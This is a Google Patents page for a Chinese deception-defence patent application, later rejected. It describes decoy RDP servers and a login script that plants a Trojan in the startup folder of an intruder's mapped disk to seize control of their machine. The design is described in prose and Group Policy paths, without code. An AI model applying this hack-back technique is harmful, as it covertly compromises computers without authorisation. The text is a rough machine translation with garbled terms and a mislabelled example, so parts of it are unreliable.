CN112134868A - Attack countercheck method and system based on RDP disk mapping - Google Patents
Attack countercheck method and system based on RDP disk mapping Download PDFInfo
- Publication number
- CN112134868A CN112134868A CN202010972668.8A CN202010972668A CN112134868A CN 112134868 A CN112134868 A CN 112134868A CN 202010972668 A CN202010972668 A CN 202010972668A CN 112134868 A CN112134868 A CN 112134868A
- Authority
- CN
- China
- Prior art keywords
- attacker
- bait
- server
- host
- rdp
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1491—Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/08—Network architectures or network communication protocols for network security for authentication of entities
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Computer And Data Communications (AREA)
Abstract
The invention provides an attack countering method and system based on RDP disk mapping, and belongs to the technical field of network security. According to the method, an IP (Internet protocol) containing an RDP (remote desktop protocol) server, a login account and a login password are stored in an enterprise network asset as baits, once an attacker obtains the baits, the RDP server is logged in, disguised file baits are stored on the RDP server, the attacker is induced to copy and paste the file baits to an attacker host, the copying and pasting of the attacker fails because the RDP server closes the copying and pasting function, a system local group strategy of the RDP server can induce the attacker to carry out disk mapping, the file baits can be automatically executed when the attacker logs in the RDP server, an executable file is implanted into the attacker host, and the attacker is completely opposed. The invention utilizes the disk mapping function of RDP to reversely implant the executable files such as Trojan horse and the like into the attacker computer, thereby achieving the effect of controlling the attacker computer.
Description
Technical Field
The invention relates to the technical field of network security, in particular to an attack countering method and system based on RDP disk mapping.
Background
Network attack behaviors are more and more, attackers are more and more, but the tracing means for the attackers is often difficult to take effect, and the tracing means comprises the tracing of the IP of the attackers, the tracing of device fingerprints and the like. Therefore, on a source tracing basis, a more effective means for countering attackers is needed. The existing means for countering attackers are not many and are often based on honeypot technology.
Chinese patent application document CN108134797A discloses an attack countering system and method based on honeypot technology, the system includes a honeypot host, a honeypot environment deployment module, a countering mechanism setting module and a countering module server, a countering module client for collecting information is arranged in the host where an attacker is located and in the network environment, and the honeypot host includes a specific document and a specific system mechanism; the honeypot environment deployment module sends signals to a honeypot host, the counter-system setting module sends signals to specific documents and specific system mechanisms in the honeypot host, the specific documents and the specific system mechanisms both send signals to the counter-system client, and the counter-system client sends the signals to the counter-system server. The information collected by the client of the reverse module comprises information of attackers and environment of the attackers; the specific document comprises word document loopholes and rtf document loopholes; specific system mechanisms include Windows RDP implant. The method is based on honeypot technology, and has high cost and uncontrollable effect.
Chinese patent application CN108540441A discloses an active defense system and method based on a real virtual network. The system comprises the following modules which are communicated with each other in a signal circulation mode: the attack detection module is used for detecting various attack behaviors and alarming in real time; the decoy guide module is used for decoy an attacker to continuously attack the false target in the system; the vulnerability simulation module is used for constructing a real vulnerability system by using a real virtual host and a network, so as to attract attackers to attack successfully; the attack isolation module is used for completely isolating an attacker from a real environment in the authenticity virtual network of the system, and the authenticity virtual network of the system cannot become a springboard of the attacker; the behavior recording module is used for comprehensively recording various attack behaviors of attackers; the intelligent analysis module is used for intelligently analyzing attack characteristics such as attack level, attack path, attack mode, attack intention and the like of an attacker; the attack playback module clearly and dynamically plays back the attack process of the attacker by using a friendly interaction means; and the attack countercheck module acquires the information of the attacker by using a hidden means and counterchecks the attacker. The system obtains and analyzes the attack behavior of the attacker, obtains the information of the attacker and controls the attacker, simulates a virtual network, is based on a honeypot technology, is complex to realize and difficult, and does not provide a specific technical means for controlling the attacker.
The prior art has at least the following disadvantages:
1. based on the honeypot technology, the cost is high, and the effect is uncontrollable.
2. The scheme of simulating the virtual network to conceal and acquire the information and the attack behavior of the attacker does not provide a specific technology for resisting the attacker
Means, no reference is available.
Disclosure of Invention
In order to solve the technical problems in the prior art, the invention provides an attack countering method and system based on RDP disk mapping, wherein the method comprises the steps that information including an IP address, a login account number, a login password and the like of an RDP server is stored in an enterprise network asset as a bait, once an attacker obtains the bait, the RDP server is logged in, a high-value disguised file bait is stored on the RDP server, the attacker is induced to copy and paste the file bait to an attacker host, the copying and pasting of the attacker fails because the RDP server closes the copying and pasting function, a system local group strategy of the RDP server can induce the attacker to carry out disk mapping, the file bait can be automatically executed when the attacker logs in the RDP server, an executable file (with aggressivity) is implanted into the attacker host, and the countering of the attacker is completed. The invention utilizes the disk mapping function of RDP to reversely implant the executable files such as Trojan horse and the like into the attacker computer, thereby achieving the effect of controlling the attacker computer.
Rdp (remote Desktop protocol), which is a multi-channel protocol, allows a client to connect to a remote computer providing microsoft terminal services. The disk mapping is used for mapping the shared folder of other machines on the network to a disk on the own machine, so that the local machine can access the shared folder of other machines and provide access time.
The nfs of the Linux system is mounted, and after an attacker mounts the Linux machine, the Linux machine has no write-in permission to the host of the attacker, so that the Linux machine cannot be used. Compared with nfs mounting of a Linux system, the disk mounting of windows has write-in permission, and the method disclosed by the invention is just to utilize the characteristic to carry out attack countering.
The invention provides an attack countercheck method based on RDP disk mapping, which comprises the following steps:
a first bait server construction step in which,
storing a first bait in a first bait server, wherein the first bait comprises information of a second bait server;
the information of the second bait server comprises credentials for logging in to the second bait server;
a second bait server construction step in which,
configuring the RDP on a second bait server;
depositing a second bait in a second bait server, the second bait including autorun code;
the code automatically runs when a user successfully logs in, and the execution of the code is used for implanting a first anti-braking instruction into the host computer of the attacker; the first countering instruction is used for countering an attacker;
configuring a local group policy of the system of the second bait server and turning off the copy and paste function of the second bait server.
Preferably, configuring the local group policy further includes setting a user login script for inducing an attacker to perform disk mapping.
Preferably, the second bait server construction step further comprises an attack and attack counter step, specifically comprising:
an attacker successfully attacks the first bait server to obtain a first bait;
the attacker logs in a second bait server according to the information of the first bait;
the second bait server runs the automatically running codes and waits for the disk of the attacker host to be mapped to the second bait server;
the attacker fails to attempt to copy the second bait in the second bait server;
the attacker is induced by a local group strategy of the second bait server, and a disk of the host of the attacker is mapped onto the second bait server to drag a second bait;
the autorun code run by a second bait server implants the first counter-braking instruction into an attacker host;
and executing a first counter-control instruction to control the host of the attacker.
Preferably, the first countering instruction is implanted into a boot directory of the attacker host and executed simultaneously.
Preferably, the information of the second bait server deposited in the first bait server includes: an IP address, a login account number, and a login password of the second bait server.
Preferably, the second decoy file name is of an attractive nature, and the automatically run code file name is of an attractive nature, and the file name comprises any one or any combination of any one of a password, IP, username, or information related to authentication and having the same meaning.
Preferably, the first anti-copy instruction is an executable file, which is used for anti-copying an attacker and performs the following operations:
carrying out counter attack on the attacker host to control the attacker host;
and obtaining host information of the attacker for attack analysis.
The invention provides an attack countercheck system based on RDP disk mapping, which comprises:
a first bait server and a second bait server;
also comprises the following steps of (1) preparing,
a bait setting module for performing the following operations:
generating a first bait, and storing the first bait on a first bait server; the first bait includes information of a second bait server;
generating a second bait, and storing the second bait on a second bait server; the second bait comprises automatically running code, the code automatically running when a user logs in, and the execution of the code is used for implanting a first anti-braking instruction to the host of the attacker; the first countering instruction is used for countering an attacker;
a second bait server local group policy setting module to:
setting a local group policy for a system of second bait servers, comprising:
setting a user login script and inducing an attacker to carry out disk mapping;
the copy and paste function of the second bait server is turned off.
Preferably, the attack analysis module is further included, and is configured to perform attack behavior analysis according to information of the attacker host obtained by the first counter instruction implanted into the attacker.
Preferably, the implanted first anti-counterfeit instruction is an executable file for anti-counterfeit an attacker, and the following operations are performed:
carrying out counter attack on the attacker host to control the attacker host;
and obtaining host information of the attacker for analyzing the attack behavior.
Compared with the prior art, the invention has the following beneficial effects:
1. the method utilizes the RDP disk mapping function to reversely implant the offensive executable files such as Trojan and the like into the host of the attacker, thereby achieving the effect of controlling the host of the attacker, having low cost and being simpler and more effective compared with other countermeasures based on honeypots.
Drawings
FIG. 1 is a flow chart of an attack countering method based on RDP disk mapping according to the present invention;
FIG. 2 is a block diagram of an attack countering system based on RDP disk mapping according to the present invention.
Detailed Description
The following detailed description of the present invention will be made with reference to the accompanying drawings 1-2.
The invention provides an attack countercheck method based on RDP disk mapping, which comprises the following steps:
a first bait server construction step in which,
storing a first bait in a first bait server, wherein the first bait comprises information of a second bait server;
the information of the second bait server comprises credentials for logging in to the second bait server;
the attacker usually is interested in the login credential information, the first bait stores information including a second bait server, the information of the second bait server includes credentials for logging in the second bait server, and the attacker is induced to log in the second bait server by using the acquired credentials for logging in the second bait server to perform next counter-work on the attacker.
A second bait server construction step in which,
configuring the RDP on a second bait server;
the method utilizes the disk mapping function of the RDP, so the RDP needs to be configured on the second bait server to prepare for disk mapping of an attacker in the next step;
depositing a second bait in a second bait server, the second bait including autorun code;
the code automatically runs when a user successfully logs in, and the execution of the code is used for implanting a first anti-braking instruction into the host computer of the attacker; the first countering instruction is used for countering an attacker;
the code is a login script code, and can be executed as soon as a user logs in, regardless of whether a disk is mounted. The execution effect is that in the case of mounting the disk of the attacker, the first anti-braking instruction, such as a trojan horse and other executable files, is implanted into the host of the attacker. The attacker can execute the method without mounting the disk, and the expected effect cannot be achieved.
After an attacker attacks and acquires the authority of the first bait server, the first bait server finds the set credential bait of the second bait server, the attacker tries to connect with the second bait server, and further finds the second bait after logging in the second bait server, the second bait is a forged high-value file, the file name of the forged high-value file is attractive, the attacker often tries to steal the second bait, once the second bait is executed, the first anti-braking instruction is implanted into the host of the attacker, the host of the attacker is controlled, and the anti-braking of the attacker is realized.
Configuring a local group policy of the system of the second bait server and turning off the copy and paste function of the second bait server.
And closing the copy and paste function of the second bait server, and mapping the disk to ensure that the attacker fails to copy and paste the second bait, so that the first anti-braking instruction can be implanted into the host of the attacker to realize the anti-braking of the attacker. The device and resource redirection option is configured as "enabled" in "group policy editor-computer configuration-management template-windows component-remote desktop service-remote desktop session host", and the copy and paste function of the second bait server is turned off.
As a preferred embodiment, configuring the local group policy further includes setting a user login script for inducing an attacker to perform disk mapping. The login script is set in "group policy editor-user configuration-windows setup-script-login".
As a preferred embodiment, the second bait server construction step further includes an attack and attack counter step, specifically including:
an attacker successfully attacks the first bait server to obtain a first bait;
the attacker logs in a second bait server according to the information of the first bait;
the second bait server runs the automatically running codes and waits for the disk of the attacker host to be mapped to the second bait server;
the attacker fails to attempt to copy the second bait in the second bait server;
the attacker is induced by a local group strategy of the second bait server, and a disk of the host of the attacker is mapped onto the second bait server to drag a second bait;
the autorun code run by a second bait server implants the first counter-braking instruction into an attacker host;
and executing a first counter-control instruction to control the host of the attacker.
In a preferred embodiment, the first countering instruction is implanted in a boot directory of the attacker host and executed simultaneously.
The first anti-braking instruction is implanted into a starting directory of the attacker host, and is used for obtaining the control right of the attacker host, and the attacker directly runs the first anti-braking instruction when starting next time, so that the attacker host is controlled by the second bait server from the beginning. And executing a first counter instruction while implanting the starting directory of the attacker host to obtain the information of the attacker host and control the attacker host.
In a preferred embodiment, the information of the second bait server stored in the first bait server includes: an IP address, a login account number, and a login password of the second bait server.
In a preferred embodiment, the second decoy file name is attractive, and the autorun code file name is attractive, and the file name includes any one or any combination of any one of a password, IP, username, and username, or is used to represent information related to authentication and having the same meaning.
As a preferred embodiment, the first anti-trap instruction is an executable file, and is used for anti-trapping an attacker and performing the following operations:
carrying out counter attack on the attacker host to control the attacker host;
and obtaining host information of the attacker for attack analysis.
The invention provides an attack countercheck system based on RDP disk mapping, which comprises:
a first bait server and a second bait server;
also comprises the following steps of (1) preparing,
a bait setting module for performing the following operations:
generating a first bait, and storing the first bait on a first bait server; the first bait includes information of a second bait server;
generating a second bait, and storing the second bait on a second bait server; the second bait comprises automatically running code, the code automatically running when a user logs in, and the execution of the code is used for implanting a first anti-braking instruction to the host of the attacker; the first countering instruction is used for countering an attacker;
the second bait induces an attacker to try to acquire the first bait, and disk mapping is carried out after the attempt of copying and pasting fails;
a second bait server local group policy setting module to:
setting a local group policy for a system of second bait servers, comprising:
setting a user login script and inducing an attacker to carry out disk mapping;
the copy and paste function of the second bait server is turned off.
As a preferred embodiment, the system further comprises an attack analysis module, configured to perform attack behavior analysis according to information of the attacker host obtained by the first countering instruction implanted into the attacker.
In a preferred embodiment, the first embedded anti-replay instruction is an executable file, which is used for anti-replay an attacker and performs the following operations:
carrying out counter attack on the attacker host to control the attacker host;
and obtaining host information of the attacker for analyzing the attack behavior.
Example 1
Referring to fig. 1-2, a method for obtaining a hash of a password of an account of a windows system according to an embodiment of the present invention is described in detail.
The invention provides an attack countercheck method based on RDP disk mapping, which comprises the following steps:
a first bait server construction step in which,
storing a first bait in a first bait server, wherein the first bait comprises information of a second bait server;
the information of the second bait server comprises credentials for logging in to the second bait server; the information of the second bait server stored in the first bait server includes: an IP address, a login account number, and a login password of the second bait server.
The attacker usually is interested in the login credential information, the first bait stores information including a second bait server, the information of the second bait server includes credentials for logging in the second bait server, and the attacker is induced to log in the second bait server by using the acquired credentials for logging in the second bait server to perform next counter-work on the attacker.
A second bait server construction step in which,
configuring the RDP on a second bait server;
the method utilizes the disk mapping function of the RDP, so the RDP needs to be configured on the second bait server to prepare for disk mapping of an attacker in the next step;
depositing a second bait in a second bait server, the second bait including autorun code; the second decoy file name has decoy property, the automatically operated code file name has decoy property, and the file name comprises any deformation or any combination of deformations in a password, IP, user name and username, or is used for representing information which is related to identity authentication and has the same meaning.
The code automatically runs when a user successfully logs in, and the execution of the code is used for implanting a first anti-braking instruction into the host computer of the attacker; the first countering instruction is used for countering an attacker;
the code is a login script code, and can be executed as soon as a user logs in, regardless of whether a disk is mounted. The execution effect is that in the case of mounting the disk of the attacker, the first anti-braking instruction, such as a trojan horse and other executable files, is implanted into the host of the attacker. The attacker can execute the method without mounting the disk, and the expected effect cannot be achieved.
After an attacker attacks and acquires the authority of the first bait server, the first bait server finds the set credential bait of the second bait server, the attacker tries to connect with the second bait server, and further finds the second bait after logging in the second bait server, the second bait is a forged high-value file, the file name of the forged high-value file is attractive, the attacker often tries to steal the second bait, once the second bait is executed, the first anti-braking instruction is implanted into the host of the attacker, the host of the attacker is controlled, and the anti-braking of the attacker is realized.
The first countering instruction is implanted into a boot directory of the attacker host and executed simultaneously. The first anti-braking instruction is implanted into a starting directory of the attacker host, and is used for obtaining the control right of the attacker host, and the attacker directly runs the first anti-braking instruction when starting next time, so that the attacker host is controlled by the second bait server from the beginning. And executing a first counter instruction while implanting the starting directory of the attacker host to obtain the information of the attacker host and control the attacker host.
The first anti-system instruction is an executable file and is used for anti-system attackers, and the following operations are executed:
carrying out counter attack on the attacker host to control the attacker host;
and obtaining host information of the attacker for attack analysis.
Configuring a local group policy of the system of the second bait server and turning off the copy and paste function of the second bait server.
And closing the copy and paste function of the second bait server, and mapping the disk to ensure that the attacker fails to copy and paste the second bait, so that the first anti-braking instruction can be implanted into the host of the attacker to realize the anti-braking of the attacker. The device and resource redirection option is configured as "enabled" in "group policy editor-computer configuration-management template-windows component-remote desktop service-remote desktop session host", and the copy and paste function of the second bait server is turned off.
Configuring the local group policy further comprises setting a user login script for inducing an attacker to carry out disk mapping. The login script is set in "group policy editor-user configuration-windows setup-script-login".
The method also comprises an attack and attack counterattack step after the second bait server construction step, and specifically comprises the following steps:
an attacker successfully attacks the first bait server to obtain a first bait;
the attacker logs in a second bait server according to the information of the first bait;
the second bait server runs the automatically running codes and waits for the disk of the attacker host to be mapped to the second bait server;
the attacker fails to attempt to copy the second bait in the second bait server;
the attacker is induced by a local group strategy of the second bait server, and a disk of the host of the attacker is mapped onto the second bait server to drag a second bait;
the autorun code run by a second bait server implants the first counter-braking instruction into an attacker host;
and executing a first counter-control instruction to control the host of the attacker.
The invention provides an attack countercheck system based on RDP disk mapping, which comprises:
a first bait server and a second bait server;
also comprises the following steps of (1) preparing,
a bait setting module for performing the following operations:
generating a first bait, and storing the first bait on a first bait server; the first bait includes information of a second bait server;
generating a second bait, and storing the second bait on a second bait server; the second bait comprises automatically running code, the code automatically running when a user logs in, and the execution of the code is used for implanting a first anti-braking instruction to the host of the attacker; the first countering instruction is used for countering an attacker;
the second bait induces an attacker to try to acquire the first bait, and disk mapping is carried out after the attempt of copying and pasting fails;
a second bait server local group policy setting module to:
setting a local group policy for a system of second bait servers, comprising:
setting a user login script and inducing an attacker to carry out disk mapping;
the copy and paste function of the second bait server is turned off.
The attack countering system further comprises an attack analysis module, wherein the attack analysis module is used for carrying out attack analysis according to the information of the attacker host, which is acquired by the first countering instruction implanted into the attacker.
The implanted first anti-copy instruction is an executable file and is used for anti-copying an attacker, and the following operations are carried out:
carrying out counter attack on the attacker host to control the attacker host;
and obtaining host information of the attacker for attack analysis.
The above description is only a preferred embodiment of the present invention and is not intended to limit the present invention, and various modifications and changes may be made by those skilled in the art. Any modification, equivalent replacement, or improvement made within the spirit and principle of the present invention shall fall within the protection scope of the present invention.
Claims (10)
1. An attack countercheck method based on RDP disk mapping is characterized by comprising the following steps:
a first bait server construction step in which,
storing a first bait in a first bait server, wherein the first bait comprises information of a second bait server;
the information of the second bait server comprises credentials for logging in to the second bait server;
a second bait server construction step in which,
configuring the RDP on a second bait server;
depositing a second bait in a second bait server, the second bait including autorun code;
the code automatically runs when a user successfully logs in, and the execution of the code is used for implanting a first anti-braking instruction into the host computer of the attacker; the first countering instruction is used for countering an attacker;
configuring a local group policy of the system of the second bait server and turning off the copy and paste function of the second bait server.
2. The RDP-disk-mapping-based attack countering method according to claim 1, wherein configuring the local group policy further comprises setting a user login script for inducing an attacker to perform disk mapping.
3. The RDP-disk-mapping-based attack countering method according to claim 1, further comprising an attack and attack countering step after the second bait server construction step, specifically comprising:
an attacker successfully attacks the first bait server to obtain a first bait;
the attacker logs in a second bait server according to the information of the first bait;
the second bait server runs the automatically running codes and waits for the disk of the attacker host to be mapped to the second bait server;
the attacker fails to attempt to copy the second bait in the second bait server;
the attacker is induced by a local group strategy of the second bait server, and a disk of the host of the attacker is mapped onto the second bait server to drag a second bait;
the autorun code run by a second bait server implants the first counter-braking instruction into an attacker host;
and executing a first counter-control instruction to control the host of the attacker.
4. The RDP disk mapping-based attack countering method according to claim 1 or 3, characterized in that the first countering instruction is implanted into a boot directory of an attacker host and executed simultaneously.
5. The RDP-disk-mapping-based attack countering method according to claim 1, wherein the information of the second bait server stored in the first bait server includes: an IP address, a login account number, and a login password of the second bait server.
6. The RDP disk mapping-based attack countering method according to claim 1, wherein the second decoy file name is decoy, the autorun code file name is decoy, and the file name includes any one or a combination of any one of a password, IP, username, and username, or is used to indicate information related to authentication with the same meaning.
7. The RDP-disk-mapping-based attack countering method according to claim 1, wherein the first countering instruction is an executable file for countering an attacker by performing the following operations:
carrying out counter attack on the attacker host to control the attacker host;
and obtaining host information of the attacker for attack analysis.
8. An attack countering system based on RDP disk mapping, characterized by comprising:
a first bait server and a second bait server;
also comprises the following steps of (1) preparing,
a bait setting module for performing the following operations:
generating a first bait, and storing the first bait on a first bait server; the first bait includes information of a second bait server;
generating a second bait, and storing the second bait on a second bait server; the second bait comprises automatically running code, the code automatically running when a user logs in, and the execution of the code is used for implanting a first anti-braking instruction to the host of the attacker; the first countering instruction is used for countering an attacker;
a second bait server local group policy setting module to:
setting a local group policy for a system of second bait servers, comprising:
setting a user login script and inducing an attacker to carry out disk mapping;
the copy and paste function of the second bait server is turned off.
9. The RDP disk mapping-based attack countering system of claim 8, further comprising an attack analysis module, configured to perform attack behavior analysis according to information of the attacker host obtained by the first countering instruction implanted into the attacker.
10. The RDP-disk-map-based attack countering system of claim 8, wherein the first countering instruction is an executable file for countering an attacker by:
carrying out counter attack on the attacker host to control the attacker host;
and obtaining host information of the attacker for analyzing the attack behavior.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202010972668.8A CN112134868A (en) | 2020-09-16 | 2020-09-16 | Attack countercheck method and system based on RDP disk mapping |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202010972668.8A CN112134868A (en) | 2020-09-16 | 2020-09-16 | Attack countercheck method and system based on RDP disk mapping |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| CN112134868A true CN112134868A (en) | 2020-12-25 |
Family
ID=73845776
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202010972668.8A Pending CN112134868A (en) | 2020-09-16 | 2020-09-16 | Attack countercheck method and system based on RDP disk mapping |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN112134868A (en) |
Cited By (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN113411314A (en) * | 2021-05-26 | 2021-09-17 | 杭州安恒信息技术股份有限公司 | Method and device for attracting attacker to access honeypot system and electronic device |
| CN114157454A (en) * | 2021-11-16 | 2022-03-08 | 中国工商银行股份有限公司 | Attack countercheck method, device, computer equipment and storage medium |
| CN115065528A (en) * | 2022-06-14 | 2022-09-16 | 上海磐御网络科技有限公司 | Attack countercheck system and method based on ftp service |
-
2020
- 2020-09-16 CN CN202010972668.8A patent/CN112134868A/en active Pending
Cited By (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN113411314A (en) * | 2021-05-26 | 2021-09-17 | 杭州安恒信息技术股份有限公司 | Method and device for attracting attacker to access honeypot system and electronic device |
| CN114157454A (en) * | 2021-11-16 | 2022-03-08 | 中国工商银行股份有限公司 | Attack countercheck method, device, computer equipment and storage medium |
| CN114157454B (en) * | 2021-11-16 | 2024-04-02 | 中国工商银行股份有限公司 | Attack countering method, device, computer equipment and storage medium |
| CN115065528A (en) * | 2022-06-14 | 2022-09-16 | 上海磐御网络科技有限公司 | Attack countercheck system and method based on ftp service |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US9773109B2 (en) | Alternate files returned for suspicious processes in a compromised computer network | |
| US9356957B2 (en) | Systems, methods, and media for generating bait information for trap-based defenses | |
| CN112134868A (en) | Attack countercheck method and system based on RDP disk mapping | |
| US10567432B2 (en) | Systems and methods for incubating malware in a virtual organization | |
| Ianelli et al. | Botnets as a vehicle for online crime | |
| US11057429B1 (en) | Honeytoken tracker | |
| Grimes | Honeypots for windows | |
| Frank et al. | Protecting IoT from Mirai botnets; IoT device hardening | |
| Yoshioka et al. | Your sandbox is blinded: Impact of decoy injection to public malware analysis systems | |
| Pouget et al. | A pointillist approach for comparing honeypots | |
| Anderson et al. | Seven deadliest USB attacks | |
| Karthikeyan et al. | Honeypots for network security | |
| Gunawan et al. | On the review and setup of security audit using Kali Linux | |
| Rana et al. | Offensive security: Cyber threat intelligence enrichment with counterintelligence and counterattack | |
| Mphago et al. | Deception in dynamic web application honeypots: Case of glastopf | |
| Efendi et al. | A survey on deception techniques for securing web application | |
| Maybaum et al. | Technical methods, techniques, tools and effects of cyber operations | |
| Djamaluddin et al. | Web deception towards moving target defense | |
| Reti et al. | Escape the fake: Introducing simulated container-escapes for honeypots | |
| Fraunholz et al. | Introducing FALCOM: A multifunctional high-interaction honeypot framework for industrial and embedded applications | |
| Innes et al. | Honeypots: How do you know when you are inside one? | |
| Gadelrab et al. | Execution patterns in automatic malware and human-centric attacks | |
| Katsinis et al. | A framework for intrusion deception on web servers | |
| EP4235470A1 (en) | Method and network component for protecting networked infrastructures | |
| Malhotra et al. | Computer Malwares Influencing The Cyber World: A Quantitative Purview |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| RJ01 | Rejection of invention patent application after publication |
Application publication date: 20201225 |
|
| RJ01 | Rejection of invention patent application after publication |